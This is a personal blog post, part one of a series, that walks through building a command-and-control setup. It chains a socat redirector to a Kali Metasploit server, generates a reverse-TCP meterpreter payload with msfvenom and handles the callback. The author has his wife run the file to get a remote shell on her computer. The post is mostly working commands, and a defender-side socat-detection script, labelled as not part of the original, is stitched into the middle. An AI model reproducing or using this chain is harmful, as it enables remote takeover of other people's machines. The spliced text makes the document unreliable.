Hi, I know it has been a while since the last post, but life got in the way. But it is time now.
My goal in the coming posts is to set up different Command and Control (C2) systems and try them out.
Information about different C2 can be found on this fantastic site https://www.thec2matrix.com/
So as always we start with a picture that we can talk about
As you can see in the above picture, my plan here is to use Socat as a proxy for different C2 systems. I hope I can get all of the above working. I will do several posts on this, one for every C2 system that I test.
So for this first post we will start with socat server and C2-1 server.
Short story first
- Get IP for external access from your best friend (Thomas) that handles network/firewall at work 🙂
- Install Socat server
- Install C2-1 server
- Configure Metasploit
- Create payload and run it on your wife’s computer
- Take over your wife’s computer
Install Socat server
We start easy with an installation of Ubuntu or any other Linux distribution of your own choosing. I used Ubuntu 20.10. Then I installed socat with the following command
sudo apt-get install socat
Then we can try out socat with this.
sudo socat TCP4-LISTEN:443,fork TCP4:invid.se:443
With the command above, this server acts as a socat proxy for my company website. Because the site uses HTTPS we will get an SSL certificate warning, but the point is to show that socat is working. Now browse to the socat server's external or internal IP and you will end up on the site or IP that you defined as the last address in the command.
If you want to forward more than one port, this is also possible with the command below
sudo socat TCP4-LISTEN:443,fork TCP4:invid.se:443 | sudo socat TCP4-LISTEN:80,fork TCP4:invid.se:80
Now that we have a simple socat server up and running and have tried out the function, it is time to move on to the C2 server.
Install C2-1 server
The first C2 server that we will install is a Kali machine, in my case a VM. I downloaded the latest version from https://cdimage.kali.org/kali-images/kali-weekly/ and did a standard installation.
When you have the machine up and running, we start by setting up Metasploit with the commands below
sudo msfdb init
msfconsole -q or without -q
We have now installed a Kali machine and configured Metasploit on it.
Now it is time to try this simple C2 server with a payload that I email my wife!
First off we start with socat. We bind port 443 on the socat server and then forward it to the C2-1 server on port 443.
sudo socat TCP4-LISTEN:443,fork TCP4:172.21.21.38:443
The socat server is accessible from the internet: if I access its external IP on port 443, the connection is forwarded to the C2-1 server. Any other port will be dropped.
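Seen from the defender's side, a relay like the one above shows up in the process list with its listen port and forward target in plain sight. The following is an added example, not part of the original post: a small shell function that picks socat TCP relays out of process command lines. The function names and the sample lines are constructed for illustration, and IPv6 targets written in brackets are not handled.

```shell
#!/bin/sh
# Added example: report socat TCP relays found in process command lines.
# Input: one command line per line, e.g. from `ps -eo args=` on the host.
# Output: "listen_port -> target_host:target_port" for each relay found.

find_socat_relays() {
    awk '
    {
        is_socat = 0; listen = ""; target = ""
        for (i = 1; i <= NF; i++) {
            arg = $i
            # The program name may carry a path, e.g. /usr/bin/socat
            if (arg == "socat" || arg ~ "/socat$") { is_socat = 1; continue }
            if (!is_socat) continue
            u = toupper(arg)            # socat address keywords are case insensitive
            if (u ~ "^TCP4?-(LISTEN|L):") {
                split(arg, a, "[:,]")   # TCP4-LISTEN:443,fork -> port is field 2
                listen = a[2]
            } else if (u ~ "^TCP4?:") {
                split(arg, a, "[:,]")   # TCP4:host:port -> host and port
                target = a[2] ":" a[3]
            }
        }
        # Only a listener paired with a TCP target is a relay
        if (listen != "" && target != "") print listen " -> " target
    }'
}

# Constructed sample of process command lines (not captured from a real host)
sample_process_list() {
    cat <<'EOF'
/usr/sbin/sshd -D
sudo socat TCP4-LISTEN:443,fork TCP4:172.21.21.38:443
/usr/bin/socat tcp4-listen:80,fork tcp4:invid.se:80
socat - TCP4:example.org:80
EOF
}

sample_process_list | find_socat_relays
```

On a live host, feed it the real process list with `ps -eo args= | find_socat_relays` and compare the result with the forwarders you expect to be running.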
Now that we have connected socat with the C2-1 server, it is time to create a payload. We use msfvenom for this. Because the C2-1 server is Kali, msfvenom is already installed, so I used this machine to create the payload
LHOST=your external ip on the socat server (your ip not mine)
LPORT=your port that the socat will forward to your C2-1 server (443)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=191.242.411.17 LPORT=443 -f elf > 1.elf
We now have an executable file for the Linux machine that we want to take over.
It is time to set up our C2 server, in this case metasploit
If you have not loaded Metasploit, do it now.
Then we run some commands to load the C2 server for us. LPORT is 443 and LHOST is the local IP of the C2-1 server
set payload linux/x64/meterpreter/reverse_tcp
set LPORT 443
set LHOST 172.21.21.38
So now we have finally set up the environment for reaching this C2 with the payload that we created.
We have now the big issue left, how do I get my wife to run this file?
or just tell her to run this?
I did go for the last one in this case.
Run the command please….
After she ran it I got this on the C2-1 server
We have the machine in our hands now!
We also have shell!
We have now tried the first C2 installation and that was metasploit with socat.
Now we move on to the next part, part 2